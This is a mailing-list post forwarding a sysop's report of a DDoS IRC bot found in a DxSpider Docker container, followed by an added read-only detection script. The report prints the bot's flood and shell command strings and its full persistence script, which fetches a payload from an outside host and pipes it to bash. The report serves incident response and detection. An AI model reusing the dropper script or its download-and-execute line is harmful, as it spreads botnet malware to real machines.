[Dxspider-support] Fwd: [sysops] URGENT Suspicious traffic in my container - Scanbot
IZ2LSC
iz2lsc.andrea at gmail.com
Sat Sep 6 18:05:01 BST 2025
Dirk et al.,
please have a look at the email below, which I received on the sysops mailing
list.
I also suggest that all sysops check whether they have something like what
Patrick reported.
Patrick stated that on his container only the dxspider port is open to the
internet.
It's a bit concerning.
Meantime I will ask Patrick to join this list.
73
andrea
iz2lsc
---------- Forwarded message ---------
From: Patrick Skerrett via sysops <sysops at dxcluster.info>
Date: Sat, Sep 6, 2025 at 5:43 PM
Subject: [sysops] URGENT Suspicious traffic in my container - Scanbot
To: <sysops at dxcluster.info>
I run DxSpider as a docker container on my swarm cluster. I had a ping this
morning from my IDS router that there was some command & control traffic to
IRC coming from the node that runs DxSpider.
In looking, I found what looks like a DDOS bot deployed on my node, as the
user 'sysop' (that the DXSpider user runs under).
*************
Considering the DXSpider server runs in an isolated container and the
suspicious files were written as the 'sysop' owner, I think I have to
conclude there is a vulnerability in the DxSpider software that allowed
this payload to be deployed!!
*********
Here is the relevant info:
Payload was written to "/var/tmp/.. /". That is dot dot space: an obfuscated
directory name to make it hard to navigate to.
The process itself is a compiled application called '-bash'
Trying to view it in a hex editor, I discovered these strings:
root at node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -E "(http|tcp|connect|socket|bot|scan)" | head -10
NOTICE %s :Unable to create socket.
http://
NOTICE %s :Unable to connect to http.
NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd
[32m botnet
[36m E.G %s -h bot -n nick -i ident -r name -c #chan -k key -xu user -xp pass
[37m bot nick is required e.g
[37m bot ident is required e.g
[37m bot realname is required e.g
Not a socket
root at node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -E "(PING|PONG|JOIN|PRIVMSG|MODE)" | head -10
MODE %s +xi
JOIN %s :%s
PONG %s
JOIN %s
MODE %s +o %s
PRIVMSG
PING
JOIN
DT_JOINABLE
_PRIVMSG
root at node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -i "NOTICE"
NOTICE %s :Unable to comply.
NOTICE %s :GET <host> <save as>
NOTICE %s :Unable to create socket.
NOTICE %s :Unable to resolve address.
NOTICE %s :Unable to connect to http.
NOTICE %s :Receiving file.
NOTICE %s :Saved as %s
NOTICE %s :Spoofs: %d.%d.%d.%d
NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d
NOTICE %s :Bot by anonymous
NOTICE %s :NICK <nick>
NOTICE %s :Nick cannot be larger than 9 characters.
NOTICE %s :DISABLE <pass>
NOTICE %s :Current status is: %s.
NOTICE %s :Already disabled.
NOTICE %s :Password too long! > 254
NOTICE %s :Disable sucessful.
NOTICE %s :ENABLE <pass>
NOTICE %s :Already enabled.
NOTICE %s :Wrong password
NOTICE %s :Password correct.
NOTICE %s :Removed all spoofs
NOTICE %s :What kind of subnet address is that? Do something like: 169.40
NOTICE %s :Unable to resolve %s
NOTICE %s :UDP <target> <port> <secs>
NOTICE %s :Packeting %s.
NOTICE %s :PAN <target> <port> <secs>
NOTICE %s :Panning %s.
NOTICE %s :TSUNAMI <target> <secs>
NOTICE %s :Tsunami heading for %s.
NOTICE %s :UNKNOWN <target> <secs>
NOTICE %s :Unknowning %s.
NOTICE %s :MOVE <server>
NOTICE %s :TSUNAMI <target> <secs> = Special packeter that wont be blocked by most firewalls
NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers
NOTICE %s :UDP <target> <port> <secs> = A udp flooder
NOTICE %s :UNKNOWN <target> <secs> = Another non-spoof udp flooder
NOTICE %s :NICK <nick> = Changes the nick of the client
NOTICE %s :SERVER <server> = Changes servers
NOTICE %s :GETSPOOFS = Gets the current spoofing
NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet
NOTICE %s :DISABLE = Disables all packeting from this client
NOTICE %s :ENABLE = Enables all packeting from this client
NOTICE %s :KILL = Kills the client
NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd
NOTICE %s :VERSION = Requests version of client
NOTICE %s :KILLALL = Kills all current packeting
NOTICE %s :HELP = Displays this
NOTICE %s :IRC <command> = Sends this command to the server
NOTICE %s :SH <command> = Executes a command
NOTICE %s :Killing pid %d.
NOTICE %s :%s
This is obviously bad stuff.
**** HOW TO DETECT IF THIS IS ON YOUR NODE****
As sudo:
ps -ef |grep ScanBot
sysop 1990 1 0 09:40 ? 00:00:00 ScanBot
# ls -l "/var/tmp/.. /"
total 5340
-rw-r----- 1 sysop sysop 72770 Sep 6 09:39 block.lst
drwxr-xr-x 2 sysop sysop 4096 Apr 3 02:55 bot
-rwxr-xr-x 1 sysop sysop 855 Feb 12 2023 clear
-rwxr-xr-x 1 sysop sysop 3272064 Oct 12 2023 curl
drwxr-xr-x 2 sysop sysop 4096 Sep 6 09:31 pass_files
-rwxr-xr-x 1 sysop sysop 2094872 Jul 13 2024 rm
-rwxr-xr-x 1 sysop sysop 499 Sep 6 09:29 scanbot
-rw-r--r-- 1 sysop sysop 0 Sep 6 10:35 scanbot.lst
drwxr-xr-x 2 sysop sysop 4096 Dec 7 2023 screen
It created a crontab entry for the sysop user:
/var/spool/cron/crontabs/sysop
root at node3:/var/tmp# cat /var/spool/cron/crontabs/sysop
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Sat Sep 6 09:29:49 2025)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* * * * * "/var/tmp/.. "/scanbot
It runs every minute and tries to re-download itself:
#!/bin/bash
cd "/var/tmp/.. "
shopt -s expand_aliases
alias curl="./curl"
type="randomscan"
host="cc.systemctl.cc"
api="scanbot.sh"
brute_type="spirit"
pubnick="sysop at 98.46.184.64"
privnick="sysop at 98.46.143.4"
scanbot()
{
url="$1"
if [ ! -z "$url" ]; then
url="url = \"$url\""
curl -K - << EOF
ipv4
fail
silent
connect-timeout = 60
max-time = 120
retry = 2
$url
EOF
sync
fi
}
scanbot
$host/$api?type=$type\&brute_type=$brute_type\&pubnick=$pubnick\&privnick=$privnick
| bash
************
Please check to see if anyone is running this process, if so, we may have a
vulnerability that would allow the DXSpider cluster to become a DDOS C&C
vector!!!
********
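Added here as an example, not code from the thread: a read-only POSIX sh check that looks for the indicators Patrick lists (the "/var/tmp/.. " staging directory and the files dropped in it, the per-minute sysop crontab entry, and a running ScanBot process). The ROOT prefix and the SCANBOT_CHECK_LIVE variable are my own additions so the check can be pointed at a mounted container filesystem or a test tree.

```shell
#!/bin/sh
# Added example, not code from the thread. Read-only checks for the
# indicators in the report: the "/var/tmp/.. " (dot dot space) staging
# directory, the dropped files, the per-minute sysop crontab entry and a
# running ScanBot process. ROOT is an optional prefix (assumed here) so the
# check can run against a mounted container filesystem or a test tree.

# Prints one HIT line per finding to stderr and the count to stdout.
scanbot_fs_indicators() {
    root="${1:-}"                       # "" = live filesystem
    stage="$root/var/tmp/.. "           # note the trailing space
    hits=0
    if [ -d "$stage" ]; then
        echo "HIT: staging directory '$stage' exists" >&2
        hits=$((hits + 1))
    fi
    # Names taken from the 'ls -l' listing in the report.
    for f in scanbot bot/-bash curl rm screen; do
        if [ -e "$stage/$f" ]; then
            echo "HIT: dropped file '$stage/$f'" >&2
            hits=$((hits + 1))
        fi
    done
    cron="$root/var/spool/cron/crontabs/sysop"
    if [ -f "$cron" ] && grep -qF '/var/tmp/.. ' "$cron"; then
        echo "HIT: sysop crontab references the staging directory" >&2
        hits=$((hits + 1))
    fi
    echo "$hits"
}

# Reads 'ps -ef' style output on stdin and prints the number of ScanBot
# processes; the grep itself is excluded, unlike a bare 'ps | grep'.
scanbot_process_check() {
    grep -i 'scanbot' | grep -v 'grep' | wc -l | tr -d ' '
}

# Live usage (as root): SCANBOT_CHECK_LIVE=1 sh check_scanbot.sh
# Exit status is non-zero if anything was found.
if [ "${SCANBOT_CHECK_LIVE:-0}" = "1" ]; then
    fs=$(scanbot_fs_indicators "")
    procs=$(ps -ef | scanbot_process_check)
    echo "filesystem indicators: $fs, ScanBot processes: $procs"
    [ "$fs" -eq 0 ] && [ "$procs" -eq 0 ]
fi
```

A clean node reports 0 for both counts; any HIT line means the container should be treated as compromised and rebuilt rather than cleaned in place.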